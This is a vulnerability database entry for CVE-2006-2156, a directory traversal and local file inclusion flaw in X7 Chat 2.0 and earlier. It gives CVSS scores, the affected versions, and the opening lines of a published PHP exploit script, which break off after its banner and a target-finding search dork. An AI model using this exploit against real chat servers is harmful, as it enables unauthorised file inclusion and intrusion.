CVE-2006-2156

Published: 03/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

Vulnerability Summary

Directory traversal vulnerability in help/index.php in X7 Chat 2.0 and previous versions allows remote malicious users to include arbitrary files via .. (dot dot) sequences in the help_file parameter.

Vulnerable Product

x7 group x7 chat 1.3.2b

x7 group x7 chat 1.3.3b

x7 group x7 chat 1.3.4b

x7 group x7 chat 1.3.5b

x7 group x7 chat 1.3.6

x7 group x7 chat 2.0

Exploits

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "X7 Chat <=20 \"help_file\" arbitrary local inclusion\r\n";
echo "by rgod rgod@autisticiorg\r\n";
echo "site: retrogodaltervistaorg\r\n";
echo "-> works regardless of magic_quotes_gpc settings\r\n";
echo " if avatar uploads are enabled (default)\r\n";
echo "dork: intitle:\"X7 Chat ...